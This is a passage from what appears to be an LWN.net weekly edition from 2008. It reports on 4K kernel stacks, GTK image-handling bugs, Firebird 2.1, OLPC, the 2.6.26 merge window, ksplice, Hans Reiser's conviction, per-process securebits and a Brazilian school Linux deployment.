x86.  In addition, an 8K stack requires two physically contiguous
pages (an "order 1" allocation) which
can be difficult to satisfy on a running system due to fragmentation. 

Linux has had optional support for 4K stacks for nearly four years now, with Fedora
and RHEL enabling it on the kernels they ship, but a recent patch to make
it the default for x86 has raised some eyebrows.  Andrew Morton sees it as
bypassing the normal patch submission process: 

This patch will cause kernels to crash.

It has no changelog which explains or justifies the alteration.

afaict the patch was not posted to the mailing list and was not
discussed or reviewed.


It is not surprising that patch author Ingo Molnar sees things a little differently:

what mainline kernels crash and how will they crash? Fedora and other 
distros have had 4K stacks enabled for years [ ... ]
and we've conducted tens of thousands of bootup tests with all sorts of 
drivers and kernel options enabled and have yet to see a single crash 
due to 4K stacks. So basically the kernel default just follows the 
common distro default now. (distros and users can still disable it)


As described in an earlier LWN
article, the main concerns about only providing 4K for the kernel stack
are for complicated storage configurations or for people using NDISwrapper.  There is
fairly high disdain for the latter case—as it is done to load
proprietary Windows drivers into the kernel—but it could lead to a
pretty hideous failure in the former.  Data corruption certainly seems like
a possibility, but, regardless, a kernel crash is definitely not what an
administrator wants to have to deal with.


Arjan van de Ven summarized the current
state, noting that NDISwrapper really requires 12K stacks, so having 8K
only makes it less likely those kernels will crash.  The stacking of
multiple storage drivers (network filesystems, device mapper, RAID, etc.)
is a bigger issue:

we need to know which they are, and then solve them, because even on x86-64
with 8k stacks they can be a problem (just because the stack frames are
bigger, although not quite double, there). 


Proponents of default 4K stacks seem to be puzzled why there is objection
to the change since there have been no problems with Red Hat kernels.  But
Andi Kleen notes:

One way they do that is by marking significant parts of the kernel
unsupported. I don't think that's an option for mainline.


The xfs filesystem, which is not supported in RHEL or Fedora, can potentially use a great deal of stack. This leads
some kernel hackers to worry that a complicated configuration that uses it,
an "nfs+xfs+md+scsi writeback" configuration as Eric Sandeen puts it, could overflow.  Work is already
proceeding to reduce the xfs stack usage, but it clearly is a problem that
xfs hackers have seen.  David Chinner responds
to a question about stack overflows:

We see them regularly enough on x86 to know that the first question
to any strange crash is "are you using 4k stacks?". In comparison,
I have never heard of a single stack overflow on x86_64....


It would seem premature to make 4K stacks the default.  There is good
reason to believe that folks using xfs could run into problems.  But there
is a larger issue, one that Morton brought up in his initial message, then reiterated later in the thread:

Anyway.  We should be having this sort of discussion _before_ a patch
gets merged, no?


The memory savings can be
significant, especially in the embedded world.  Coupled with the
elimination of order 1 allocations each time a process gets created, there is good
reason to keep working toward 4K stacks by default.  As of this writing,
the default remains for 4K stacks in Linus's tree, but that could change
before long. 


		Image handling vulnerabilities


Bugs that linger for eight years without a fix are probably annoying to
whoever reported them; perhaps others as well.  When those bugs have
possible security implications, it is hard to see how they can remain
unfixed for even eight months, let alone years, but that appears to be the case
with some GTK image handling bugs.  Code to handle image formats has been
the source of numerous vulnerabilities along the way, which makes it even
harder to see why these have languished so long. 


A call for ideas for a hackfest on the GNOME foundation mailing list seems
like a bit of a strange place to find information about vulnerabilities,
but in the ensuing thread, Michael Chudobiak brought up some bugs that he would like to see addressed,
perhaps as part of a hackfest: 

I'd like to suggest one possible topic: The pixbuf loaders. They're slow 
and memory intensive, and this drags down anything that needs thumbnails 
(Nautilus, etc). There is a lot of opportunity to improve the 
responsiveness of the desktop here.


The bugs he listed were from 2002 (80925), 2004 (142428), and
2008 (522803), but
Alan Cox mentioned that he reported one of them as a GNOME
security bug "about eight years ago".  In his opinion all of the bugs were
of the "well known, never fixed" variety.  Because the code in question
lives in GTK—used by many GNOME applications—"quite a few gnome
apps fed small compressed images explode". 


The basic problem is that the routines handling images create the
full-resolution image in memory regardless of the size requested.  In
addition, various memory-intensive techniques are used to scale the image
 to the requested size.  This impacts Nautilus and other GNOME programs
that create thumbnails of large images.


Presumably, a denial of service, at a minimum, can result from these
operations, though there may be other ways to exploit any program crashes
that result.  Cox has a plan to see them get fixed: 


Unfortunately they are well known but nobody seems to care. I'll forward
your message to the vendor security list and we'll see what happens.
Probably the bug just needs to be made *very* public to incentivise
people to fix it 8)


The vendor security list, often abbreviated vendor-sec, is a closed mailing
list for distribution security teams to exchange information about vulnerabilities in
various programs.  It is closed so that bugs that are not publicly known
can be freely discussed.  Whether Cox's posting to that list spurs any
action remains to be seen.


It is a rare week where LWN does not report some kind of image handling
botch as a new vulnerability.  This week, a cups vulnerability in handling
PNG files could lead to a denial of service; last week we reported an Opera
vulnerability in handling images in HTML canvas elements that could
possibly lead to arbitrary code execution.  Image handling
is an area where all bugs need to be scrutinized carefully for potential
security issues. 


Hopefully, part of the problem is that the GNOME hackers did not realize
the security implications of the bugs.  There does seem to be ample
complaint about performance problems, though, to get some kind of action
over the last six or eight years.  This is a set of related bugs that have
seemingly been overlooked for a long time.  Perhaps that time is now coming
to an end. 


		Firebird adds new features with version 2.1


Firebird
is one of the popular open-source relational database management systems
(RDBMS) that runs under Linux.  From the
about Firebird document:


Firebird is a relational database offering many ANSI SQL standard features that runs on Linux, Windows, and a variety of Unix platforms. Firebird offers excellent concurrency, high performance, and powerful language support for stored procedures and triggers. It has been used in production systems, under a variety of names, since 1981.
The Firebird Project is a commercially independent project of C and C++ programmers, technical advisors and supporters developing and enhancing a multi-platform relational database management system based on the source code released by Inprise Corp (now known as Borland Software Corp) on 25 July, 2000.

<!-- LWNPutAdHere -->

Stable version 2.1 of Firebird was

announced on April 18, 2008:
"Firebird 2.1 is a full version release that builds on the architectural changes introduced in the V.2.0 series. Thanks to all who have field-tested the Alphas and Betas during 2007 and the first quarter of 2008 we have a release that is bright with new features and improvements, including the long-awaited global temporary tables, a catalogue of new run-time monitoring mechanisms, database triggers and the injection of dozens of internal functions into the SQL language set."


A summary of new features from the release announcement includes:

Database triggers for making user-defined triggers have been added.
 Global temporary tables are now available for the handling of non-persistent data.
 New common table expressions are available for making dynamic recursive queries.
 An optional RETURNING clause which supports update, insert and delete operations has been added.
 The MERGE function now has an UPDATE OR INSERT statement for performing conditional operations.
 The new LIST() function can retrieve information in the form of a comma-separated list.
 New built-in functions have been added to replace UDF library calls.
 Text BLOBs up to 32K in length can now masquerade as varchars.
 Procedural SQL (PSQL) local variables can now be declared using domains.
 PSQL variables and arguments can be COLLATEd.
 A new DDL CREATE COLLATION command has been added, replacing the need for a script.
 New Unicode collations can be applied to any character set.
 The ability to perform run-time database snapshot monitoring via SQL has been added.
 The performance of the remote protocol has been improved to better support operation on slow networks.


More details on the version 2.1 release are available in the

release notes [PDF].  The document should be read by those who
are upgrading from older versions of Firebird.
The release notes list a number of additional changes, including:


The reworking of the on disk structure (ODS).
 Improvements to the PSQL error stack trace. The availability of more context information. A new fbsvcmgr command-line interface to the Services API. Support for named cursors. Implementation of the new XNET local transport protocol. A rework of the garbage collection mechanism.
 The Services API to Classic architecture port has been finished.
 Lock timeouts are now available for WAIT transactions. New Database Shutdown Modes have been added.
 The NULL handling for UDFs has been improved. There have been synchronization logic improvements.
 Support has been added for 64 bit platforms.
 Larger record enumeration limits are now supported.
 Debugging improvements have been added.
 Connection handling on the POSIX superserver has been improved.
 The PSQL invariant tracking system has been reworked.
 The ROLLBACK RETAIN clause is now supported.
 There have been improvements made to the optimizer routines.
 Numerous Windows improvements have been added.


Clearly, the Firebird developers have been busy working on this software.
If the above lists aren't enough, the Firebird home page
notes that there is a mechanism for users to request more new features.
The

development roadmap for 2008 gives an idea of where the
project is headed.  Several bug fix releases are scheduled for version
2.1 in the near future and work on the next major release, version 2.5,
is already in progress.
Firebird is available for download
here.


		OLPC at a turning point


It looks like hard times for the One Laptop Per Child project.  Quite a few
key developers have left, including Mary Lou Jepsen, Ivan Krstić,
Andres Salomon, and Walter Bender.  Laptop deployments are far below the
several million that the project had hoped for by this time, and many of
the goals for the system's software have not been achieved.  There is
persistent talk of supporting Windows, with suggestions that Linux could be
dropped altogether.  An ongoing
thread on the project's development mailing list shows that quite a few
participants are concerned about where things are going.  To many, it
seems, OLPC is about to go down as a noble failure.


These rumors may be just a bit premature, though.  When considering what
may really come of OLPC, it's worth keeping a few things in mind.


One of those is the fact that the project has just completed a major push
to its first mass-production system.  Your editor has watched the project
closely enough to see that, as with many such efforts, the people involved
have been putting in lots of long hours to get the job done.  When this kind
of pressure is lifted, it is natural to take a break, catch up on the house
work, and, perhaps, find a new job.  So the departure of some key staff at
this stage is not entirely surprising.


A look at the state of OLPC's software suggests that the project had set an
overly ambitious set of goals for its first release.  When that happens,
one must jettison some objectives; the later that this is done, the more
likely it is that the wrong objectives will be tossed overboard.  There are
signs that OLPC tried to do too much for too long, with an end result
which is not as stable, as fast, or as fully-featured as one would like.
As many people close to the project have noted, the laptop's software
remains immature.  But, as former president Walter Bender put it:


	While [we] have heard a lot of noise about performance in the media and
	from some members of the development community, it has not, in my
	experience been a major road-block in the school trials and
	deployments. There are lots of bugs and lots of things that could
	be improved upon, and these should certainly be addressed, but the
	characterizations being made in this thread do not reflect the
	realities of the OLPC deployments--the children and teachers are
	using the laptops and are learning.


Finally, the number of laptops delivered to children is far below the
level the project had planned upon.  Fewer deployments means a lower impact
for the project, but it also cannot be helping to create the economies of
scale the project had counted on to push the cost down.  There have also
been some embarrassing failures along the way, including the misplacing of a
large number of "Give one get one" orders until after it was too late to
include them in the manufacturing run.


All of the above points to a need to make some changes in how the project
is run.    Changes
always create uncertainty, so it would be surprising if OLPC participants
were not a little nervous at the moment.


What happens in the next few months will likely determine OLPC's fate.  The
project's leadership has famously said in the past that OLPC is an
education project, not a laptop project.  Some people have recently expressed concerns that, in fact, OLPC is
turning into a laptop project, with deployment numbers being the main
goal.  Nicholas Negroponte doesn't help when he allows
himself to be quoted as being "mainly concerned with putting as
many laptops as possible in children's hands."  If OLPC becomes
primarily a low-cost laptop vendor, and especially if it goes to
proprietary operating systems as a means toward that end, it will lose much
of the community that has grown up around the project.


And that would be a shame.  There is great beauty in the idea of putting a
well-designed learning tool into the hands of children and empowering those
children by providing a system which is completely open and hackable.  A
large and motivated community of highly-capable people came together behind
that vision and did their best to rethink how this technology should work
and create something better.  Deployment groups in a number of countries
have gotten the resulting systems into the hands of thousands of children,
and many of them are reporting good results.  A lot of good things have
happened here, and it doesn't have to end now.


But it might end soon.  To pull things together, the project will have to
communicate a clearer vision of where it plans to go with its
software at all levels; Mr. Negroponte's statement of continued support for
Sugar appears to be an attempt to start this process.  The operational
side of the project needs to get its act together.  Some transparency on,
for example, what is being done with donation money and what agreements
have been made with outside corporations, would be most helpful.  And, most
of all, the group of volunteers working with this project have to be
convinced anew that they are not wasting their time.  If the project's
leadership can manage all of that, there may well be great things coming
from OLPC in the future.

		The 2.6.26 merge window, part 2


Since last week's summary was
written, another 3700 changesets have found their way into the
mainline git repository.  The most significant user-visible changes
include:


 New drivers have been merged for Wolfson WM9713 codecs,
     TI DAVINCI AC97 sound chips,
     Emagic Audiowerk 2 soundcards,
     x86 PC speakers (new driver which makes them look like sound cards),
     Asus AV100 (Xonar DX) sound cards,
     Micron MT9M001 and MT9V022 cameras,
     PXA27x Quick Capture cameras,
     Kworld ATSC 120 tuners,
     cx23417 MPEG encoders,
     Integrant ITD1000 tuners,
     Philips TDA10048HN-based demodulators,
     Philips SAA7171/3/4 audio/video decoders (the last out-of-tree IVTV
     driver),
     Auvitek AU8522 demodulators,
     Samsung S5H1411-based tuners,
     framebuffer, keyboard, and mouse virtual devices (for Xen),
     several Wolfson Microelectronics touchscreens,
     wireless Xbox 360 controllers,
     Zhen Hua PPM-4CH transmitters,
     SPCP8x5 USB to serial adaptors,
     NCR 53c9x SCSI controllers (replacement driver),
     Freescale 8610 and 5121 display interface units,
     Intel 965G/965GM integrated graphics controllers,
     TI OMAP sound controllers (including the one on the Nokia 810),
     Eee PC function keys, and
     Intel IXP4xx Ethernet devices.


 There is now "basic" support for braille screen readers.

 Support for the One Laptop Per Child XO architecture has been merged 
     into the mainline.

 The new virtual files found in /proc/pid/mountinfo 
     provide information on all filesystem mounts visible to the relevant
     process. 

 The new virtual file /proc/vmallocinfo displays information
     on use of vmalloc space within the kernel.

 The SPARC Niagara architecture now has NUMA support.

 The Xen balloon driver (allowing memory to be added to or removed from
     virtual guests) has been merged.

 By default, /dev/mem can no longer be used to access RAM;
     Fedora and Red Hat have applied this patch for years, but now it has
     found its way into the mainline.

 The KVM paravirtualization subsystem now supports the S/390, PowerPC
     440, and ia64 architectures.

 Per-process "securebits" are supported.  These bits control how a
     process's capability bits are managed; the patch is intended to help
     those who would transition over to a fully capability-based system.
     See this article for a
     more detailed description of this feature.

 The getrusage() system call has a new RUSAGE_THREAD
     option which causes it to return information about the current thread
     only. 

 The device whitelist control group patch (described briefly in this article) has been
     merged. 

 It is now possible to create and use partitions with network block
     device (NBD) devices.

 The audit subsystem can now test events against the type of the file
     being operated upon.

 The VFS now makes backing device information available under
     /sys/class/bdi.  Interested people can look at per-device
     readahead and writeback variables there.

 The FUSE filesystem now supports the creation of shared writable
     memory mappings.


Changes visible to kernel developers include:


 ioremap() on the x86 architecture will now always return an 
     uncached mapping.  Previously, it had taken a more relaxed approach,
     leaving the caching as the BIOS had set it up.  The practical result
     was to almost always create uncached mappings, but with
     occasional exceptions.  Drivers which depend on a cached mapping will
     now break; they will need to use ioremap_cache() instead.

 The Video4Linux2 API now defines a set of controls for camera devices; 
     they allow user space to work with parameters like exposure type, tilt
     and pan, focus, and more.

 On the x86 architecture, there is a new configuration parameter which
     allows gcc to make its own decisions about the inlining of functions,
     even when functions are declared inline.  In some cases, this
     option can reduce the size of the kernel's text segment by over 2%.

 The legacy IDE layer has gone through a lot of internal changes which
     will break any remaining IDE drivers.

 The nopage() virtual memory area operation has been removed;
     all in-tree code is now using fault() instead.

 The SLUB allocator supports a new sysfs file
     (/sys/kernel/slab/name/order) which allows system
     administrators to change the size of page allocations used by the
     named slab.

 A condition which triggers a warning from WARN_ON will now
     also taint the kernel.

 The get_info() interface for /proc files has been
     removed.  There is also a new function for creating /proc
     files:


     This version adds the data pointer, ensuring that it will be
     set in the resulting proc_dir_entry structure before user
     space can try to access it.

 The object debugging
     infrastructure has been merged.


The merge window remains open; tune in next week for (what should be) the
final set of changes merged for 2.6.26.

		Ksplice: kernel patches without reboots


The kernel developers are generally quite good about responding to security
problems.  Once a vulnerability in the kernel has been found, a patch comes
out in short order; system administrators can then apply the patch (or get
a patched kernel from their distributor), reboot the system, and get on
with life knowing that the vulnerability has been fixed.  It is a system
which works pretty well.


One little problem remains, though: rebooting the system is a pain.  At a
minimum, it requires a few minutes of down time.  In many situations, that
down time cannot be tolerated.  Reboots also disrupt any ongoing work,
break existing network connections, and can cause the loss of results from
long-running processes.  And, most importantly of all, reboots prove
traumatic for a certain subset of Linux administrators who prize a long
uptime above almost all other things.  Administrators currently have to
choose between multi-year uptimes and security fixes; anything which frees
them from a dilemma of this magnitude can only be welcome.


That "anything" might just be a recently-announced project called ksplice.  With ksplice, system
administrators can have the best of both worlds: security fixes without
unsightly reboots.


An in-depth explanation of how ksplice works can be found in this document [PDF].
In short, ksplice requires as input the source tree for the running kernel
and the security patch.  It will then build two kernels, one with the patch
and one without; the kernels are built with a special set of options which
makes it easy to figure out which functions change as a result of the
patch.  The two kernels will be compared, with the purpose of finding those
functions.  Changes can propagate further than one might expect, especially
if, for example, an inline function is modified.


Once a list of changed functions has been made, the updated code for those
functions is packaged into a kernel module and loaded
 into the system.  Then comes the tricky part: getting the
running kernel to start using the new code.  That requires patching the
running code, which is a risky thing to do.  Ksplice starts with a call to
stop_machine_run(), which dumps a high-priority thread onto each
processor, thus taking control of all processors in the system.  It then
examines all threads in the system to ensure that none of them are running
in the functions to be replaced; if so, trampoline jumps are patched into
the beginning of each replaced function (they "bounce" the call to the old
code into the replacement code) and life continues.  Otherwise
ksplice will back off and try again later.


This method imposes a number of limitations.  One is that only code changes
can be patched in with ksplice; patches which make changes to data
structures cannot be accommodated.  Another comes from the retry-based
approach to ensuring that no threads are running in the patched functions;
what happens if one of those functions is never free?  Kernel functions
like schedule(), sys_poll(), or sys_waitid() are
likely to always have processes running within them.  In cases like this,
ksplice will eventually give up and inform the user that the patch cannot
be done; it is simply not possible to make changes to those particular
functions.


These limitations mean that, out of 50 security patches examined by the
ksplice developers, eight could not be applied with ksplice.  So multi-year
uptimes are probably still incompatible with the application of all
security patches.  Even so, ksplice certainly has the potential to reduce
patch-related downtime considerably.  Chances are good that there will be a
fair amount of interest in ksplice in sites running high-uptime,
mission-critical systems.


There are few things in the way of an immediate merge of this code into the
mainline.  One is a matter of coding quality and can be fixed.  Then, there
is the matter of the lead developer being
unconvinced that merging this code makes sense since it is,
essentially, a standalone feature.  Andi Kleen's response made the (usual) reasons for merging
the code clear:


	To be honest you weren't the first to come up with something like
	this (although you're the first to post to l-k as far as I
	know). But the usual problem of something that is kept out of tree
	is that it eventually bitrots and gets forgotten. The only sane way
	to make such extensions a generically usable linux feature is to
	merge them to mainline.


So, presumably, the code will eventually be proposed for a mainline merge.
But there is one other little difficulty pointed out by Tomasz Chmielewski: 
Microsoft holds a
patent described this way:


	A system and method for automatically updating software components
	on a running computer system without requiring any interruption of
	service. A software module is hotpatched by loading a patch into
	memory and modifying an instruction in the original module to jump
	to the patch.


Microsoft came up with this novel new technique in the distant past: 2002.
The posting immediately brought out a crowd of surprised graybeards who
distinctly remember using such techniques on their PDP-11 systems some
decades before Microsoft "invented" hot-patching.  The basic claim of the
patent would thus appear to be invalidated by some decades' worth of prior
art, but some of the dependent claims include features (such as capturing
all other processors on the system) which were unlikely to be useful on
PDP-11s.  

Given that the kernel developers are now well aware of this
patent, they must take it into account when deciding whether to accept this
code into the mainline.  It would not be surprising if they chose to avoid
baiting the Microsoft FUD machine in this way, even if they all agreed that
the patent lacked validity.  So a promising technology risks being left out
of the kernel as the result of a software patent which was filed at least
30 years too late.

		On the conviction of Hans Reiser


On April 28, a California jury found Hans Reiser guilty of first-degree
murder.  There has been a lot of speculation in the press, both before and
after the conviction, on what the loss of Mr. Reiser will mean for the
Linux community.  Much of that speculation, it seems, lacks an
understanding of what Mr. Reiser's role in the community really was.  Your
editor will take no position on whether his conviction was correct or just.
But there are things to be said about what this conviction will mean.


Hans Reiser was, of course, the designer (and, to an extent, implementer)
of the reiserfs filesystem.  When it was merged, reiserfs had the
distinction of being the first journaling filesystem for Linux which was
intended for general use; it also offered good performance in some
situations, especially those involving lots of small files.  Reiserfs saw a
significant amount of use and was adopted by a handful of distributors.
There are, doubtless, quite a few reiserfs deployments still operating out
there.


Mr. Reiser's role in reiserfs development and maintenance ended some years
ago, though.  He stopped work on it when reiser4 development started, and
even opposed the incorporation
of improvements done by others.  Reiserfs 
continues to be maintained independently of its creator, though there is
not much interest in adding features to it at this point.  Reiserfs is
nearing the end of its run, and nothing which happened this week has
changed that situation in any way.


There is more concern about what will happen with Reiser4, Mr. Reiser's
next generation filesystem.  Many reports have suggested that current
events spell the end for this project, but it is worth taking a look at the
longer history.  Reiser4 is not exactly new; it was first posted in 2002.  Mr. Reiser made
an unsuccessful effort to get it merged for the 2.6.0 kernel, and frequently
thereafter.  He blamed commercial interests and
politics for his failure in this regard, but the real situation is more
straightforward than that.


Reiser4 tried to do a number of things very differently from other
filesystems.  It included some very non-POSIX semantics which raised red
flags within the development community.  There was a multipurpose
reiser4() system call which implemented a wide range of features
and included an in-kernel interpreter for a special language.  There was a
low-level plugin mechanism which raised concerns (not all justified) about
varying on-disk formats and proprietary formats.  Reiser4 did many things
at the filesystem level that others thought should be done at the virtual
filesystem level 
instead.  The "files as
directories" feature, beyond striking people as strange, opened up a wide
range of trivial deadlock scenarios.  


In summary, this code was nowhere near ready for inclusion into the
mainline kernel.  Kernel development projects which are done in isolation
often encounter this kind of surprise when they are finally posted to the
development community. 


Over the next few years work on reiser4 continued.  Many of the problems
were solved by simply removing most of the features which made reiser4
unique, turning it into just another filesystem.  Once you have just
another filesystem, attention will turn to performance; in this case, many
people found that they got benchmark results which differed from those
posted by Mr. Reiser.  Community interest in this filesystem fell over
time, and the development rate fell as well.  There was still work
happening to prepare reiser4 for the mainline kernel when Mr. Reiser was
arrested, but it was moving slowly.


Perhaps the biggest obstacle to the inclusion of reiser4, though, was the
confrontational approach taken toward the rest of the community.
When developers pointed out problems with reiser4, Mr. Reiser had a
tendency to question their motives rather than pay attention to what they
were saying.  His interactions with the community were characterized by
statements like:


	What makes you think kernel developers have a deep understanding of
	the value of connectivity in the OS? They don't. The average kernel
	developer is not particularly bright.


A number of developers reached a point where they simply chose not to
engage with him any more.  By rejecting the development community,
Mr. Reiser remained forever an outsider to it.


And that is why the practical effect of Mr. Reiser's conviction on the
community will be relatively small, at least in the short term.  As
brilliant as he is, his effectiveness was limited by his disregard for the
rest of the community and his certainty of always being right.  He could
have accomplished much more with a different approach.


That said, his loss is unfortunate.  He did prove able, over a number of
years, to raise funds for Linux filesystem work, and the community
benefited from that work.  Some of the reiser4 developers are still
interested in working on that code, and they still submit patches.  But now
nobody is paying them to do that work, which puts the whole enterprise in
danger.  There are limits to how long reiser4 development can be carried
forward as a labor of love.


The biggest loss, though, is elsewhere.  More than anybody else, Mr. Reiser
put a lot of thought into what our systems should look like in the future.
He saw capable filesystems as the way to make our systems far more powerful
than they are now.  In a world where the filesystem was the only namespace
of any significance on the system, all objects would be equal and the
number of potential connections between them would explode.  His long-term
goal was not (just) better benchmarks; it was to create a filesystem which
could serve as this all-encompassing namespace.  It was a radical idea, and,
perhaps, impractical.  But our future comes from ideas like that.


After a few relatively quiet years, there is now a flurry of activity
around Linux filesystems.  The challenges in this area are large, but we
have many highly capable developers working on the problem and there can be
no real doubt that Linux filesystems will continue to be among the best
available anywhere.  But
that development community has lost a voice which, for all its faults, had
some unique and innovative things to say, and we are all poorer for it.

		Restricting root with per-process securebits


Linux capabilities have had a long and somewhat tortuous journey as part of
the Linux kernel.  Slowly—and very carefully—functionality is
being added to this security feature to get it to a point where it is a
viable alternative to the all-or-nothing setuid(0) model.  A
recently merged patch
adds a per-process securebits feature that will allow capabilities-based
daemons or subsystems to coexist with existing setuid utilities.


Linux capabilities break up the privileged tasks
normally associated with root (i.e. uid 0) into finer-grained abilities
which can be individually granted or revoked for specific processes.  The
idea is to change the standard Unix model that root has all special
privileges while all other users have none.  
The terminology is always a bit contentious, though, as Linux capabilities are
derived from a POSIX proposal that was never adopted, but shares the name
"capabilities" with an entirely
different approach; this article is only concerned with capabilities of
the Linux variety.


There has long been interest in creating a Linux system that did not rely upon
a single root account.  Capabilities are seen as the way to
get there, but they have suffered from a bit of a chicken-and-egg problem.
With the recent work to add file-based
capabilities and restore
CAP_SETPCAP to its original meaning, a true
capabilities-based system is becoming possible.  In the patch, which has
been merged for 2.6.26, Andrew Morgan describes the new functionality:

The feature added by this patch can be leveraged to suppress the privilege
associated with (set)uid-0.  This suppression requires CAP_SETPCAP to
initiate, and only immediately affects the 'current' process (it is inherited
through fork()/exec()).  This reimplementation differs significantly from the
historical support for securebits which was system-wide, unwieldy and which
has ultimately withered to a dead relic in the source of the modern kernel.


The patch removes the global securebits variable, replacing it with an
entry in struct task_struct, that can be manipulated by a process,
but only for itself—and any children.  Morgan envisions hybrid
systems that have 
some utilities using capabilities to get their privileges along with some
setuid(0) utilities.  In that scenario, a capabilities-based
utility or daemon may wish to limit what its children can do, even if they execute a
setuid(0) binary.  As part of the evolution, process trees can be
created that cannot get root privileges.


Processes which have the CAP_SETPCAP capability can change their securebits setting
via the prctl() system call.  There are three separate bits that
govern the interaction of capabilities and setuid:

SECURE_NOROOT – enabling this gives no special privileges to uid
0
SECURE_NO_SETUID_FIXUP – setting this bit disables capability
fixes when transitioning from or to uid 0 via setuid.  This might be
done for compatibility with older programs that use setuid to
reduce their privileges.
SECURE_KEEP_CAPS – when set, a process can retain its
capabilities even when transitioning to a normal (not uid 0) user.  This
bit is cleared by exec().

Each of these bits also has a companion *_LOCKED bit that, if set,
will not 
allow any user program to alter the corresponding setting. 
As Morgan notes in the patch, a program that can set its capabilities (has
CAP_SETPCAP) can drop all privileges for itself and any child
process by doing:

This is the equivalent of setting SECURE_NOROOT, SECURE_NO_ROOT_LOCKED,
SECURE_NO_SETUID_FIXUP, SECURE_NO_SETUID_FIXUP_LOCKED, and
SECURE_KEEP_CAPS_LOCKED. 


The memory of the sendmail-capabilities bug from 2000 makes some
a bit queasy—or worse—about any patches that involve
capabilities and setuid.  Andrew
Morton asks: "what was the bug which
caused us to cripple capability inheritance back in the days of yore? (Some
sendmail thing?)" 
That bug was caused because unprivileged users could take away the
CAP_SETUID capability from setuid binaries like
sendmail.  When sendmail then used setuid to drop its privileges,
it failed, but sendmail did not check, so it was still running with full
privilege.  This could be leveraged by a user to gain root privileges. It
was a disconnect between capabilities and 
the longstanding behavior of Unix-like systems when dropping privileges.


Morgan has written a
detailed
description of the sendmail-capabilities bug in response to Morton's
questions.  He makes it clear that he wants to move toward full capability
support without breaking existing code:

I'm basically interested in evolving the capability implementation
back to the POSIX.1e model and making it whole - but most certainly
*without crippling legacy superuser support in the process* .

As folk get more comfortable with this full capability model. I
believe we can delete more cruft from the main kernel, but even that
clean up will leave a fully functional legacy model in place. I feel
it should be for something like init, or one of its children to be
able to run subsystems in capability-only or legacy modes.


Morton seemed satisfied that his concerns had been addressed, but still
wonders about the future for capabilities: "So how do we ever get to the stage where we can recommend that distributors
turn these things on, and have them agree with us?"  This was echoed by Ismail Dönmez, who was looking
for concrete examples of how to use the per-process securebits feature.
Morgan provides a pointer to some examples along with his belief that
sometime soon the capabilities developers will become confident enough to
recommend turning off the "experimental" flag for the
SECURITY_FILE_CAPABILITIES kernel configuration.  That flag
governs both the file-based capabilities as well as the per-process
securebits.  In addition, Morgan says:

More importantly I'm hopeful that in that time we'll have accumulated
enough documentation and user-space experience and examples to convince
others that this is, indeed, a viable feature to support in mainstream
distributions.


A developerWorks
article on file-based capabilities by Serge Hallyn and a web page on POSIX
capabilities by Chris Friedhoff were both mentioned in the thread as
good references for the work being done to actually use capabilities
in systems.  Those pre-date the securebits work, so Dönmez was looking
for use-cases for the new feature.  Morgan replied that containers were
one, deferring to Hallyn who has some ideas on
using securebits:

We tend to talk about 'system containers' versus 'application
containers'. A system container would be like a vserver or openvz
instance, something which looks like a separate machine. I was
going to say I don't imagine per-process securebits being useful
there, but actually since a system container doesn't need to do any
hardware setup it actually might be a much easier start for a full
SECURE_NOROOT distro than a real machine. Heck, on a real machine init
and a few legacy [daemons] could run in the init namespace, while users
log in and apache etc run in a SECURE_NOROOT container.

But I especially like the thought of for instance postfix running in a
carefully crafted application container (with its own virtual network
card and limited file tree and no visibility of other processes) with
SECURE_NOROOT on.


Capabilities are an interesting, but complicated, security feature.  For
most of the ten years they have been part of the Linux kernel, they have
either been broken, ignored, or both.  With the latest work being done by
Hallyn, Morgan, and others, capabilities are finally becoming a fully-working
alternative to things like SELinux.  It will be interesting to see if
more user utilities will become capability-aware and whether distributions
start using capabilities.  Some day, root may just fade away.


		Large educational Linux deployment for Brazil


Numbers like 52 million are attention grabbers, especially when they refer
to students getting access to Linux.  That's the number of Brazilian
public school students who will have access to Linux-based educational
computers in some 53,000 labs spread throughout the country.  As reported 
on Mauricio Piacentini's weblog, the Brazilian government already has
17,000 of the labs up and running and plan to be fully rolled out by the
end of 2009.


The project, called ProInfo, is run by the Ministry of Education (MEC) for
Brazil.  Piacentini heard about it at the recent Fórum Internacional Software
Livre (FISL) conference, which is held annually in Porto Alegre,
Brazil.  He noted that the project is not only providing computers and
infrastructure, but also a "Linux Educacional" distribution with free
educational and entertainment software along with other "open content".


 The distribution is Debian-based using KDE 3.5 as its desktop.
Packages from the KDE Education Project
(KDE-Edu) and KDE Games Center
(KDEGames) were included.  The project customized the interface, adding a
quick navigation bar at the top (seen at left).  This is the second version
of the distribution incorporating feedback from installations of the
previous version.  The distribution ISOs, open content, and some
documentation (all in Portuguese) can be found at the MEC ProInfo
website.  

There are various different lab configurations that ProInfo has devised
that depend on the nature of the location of the school.  Urban labs have
equipment for up to fifteen students whereas rural installations have
power-friendly hardware that can support up to five users.  There is also a
configuration targeted at schools for people with special needs that has a large
display and accessibility tools added to the distribution.  ProInfo also
has a project that sounds much like OLPC, except in Portuguese: Um
Computador por Aluno ("One computer per student") that plans to bring
150,000 laptops (possibly Intel Classmate PCs) to students over the next
year or so.


Some have quibbled about the number of students estimated, but even if it is
overestimated by a factor of two or three—which seems
unlikely—it is still an enormous project that will impact a huge
number of students.  Free software is perfect for these kinds of projects,
because it can reduce the hardware requirements significantly, eliminate
licensing nightmares, and provide a look "under the hood" for students who
are interested.  Computer skills are largely portable if some of
those students end up using other operating systems in the future, but
because they are using free software now, any documents, pictures, music,
and other data files will be able to move with them.


Folks from the KDE project are justifiably proud of this deployment.
It uses KDE 3.5, but plans are afoot to work with MEC to explore using KDE4
down 
the road according to KDE hackers Piacentini and Aaron
Seigo.  Many have been concerned about the future of KDE 3.5, but the
project has always maintained that it will be around for a long time.  As
Seigo says: 

KDE 3.5 will be supported in the market for many years to come due to
deployments such as this one. Looking towards the future, KDE4 will likely
make some things even easier for them in the future, such as how to
implement the navigation bar they added to the top of desktop as a result
of usability research done involving this specific audience. With Plasma, a
few lines of JavaScript is all that would be needed. 


Proponents of the other desktops or distributions should be cheering this
deployment as well.  There will probably be lots of lessons learned that
can apply to other projects in Brazil or elsewhere that standardize on a
different set of software components.  This is an exciting project for
the free software community.  But even more importantly, it is great to see
so many of these tools become available to those who have not yet been
exposed to them.   


		Distributions in the Summer of Code


  For the fourth year, Google's
  Summer of Code will pay undergraduate students to work with some of the
  world's top developers on open-source projects. Students and mentors also
  get a T-shirt, which for many of us is motivation enough. Many of the accepted projects are not
  surprising, such as GNOME, KDE, Drupal, and Python. One interesting category
  of projects, however, is distributions. Aren't they just writing packages?
  What would they do with a Summer of Code project? That's what this article
  aims to discover.


  This year, four distributions were accepted for a combined total of 40
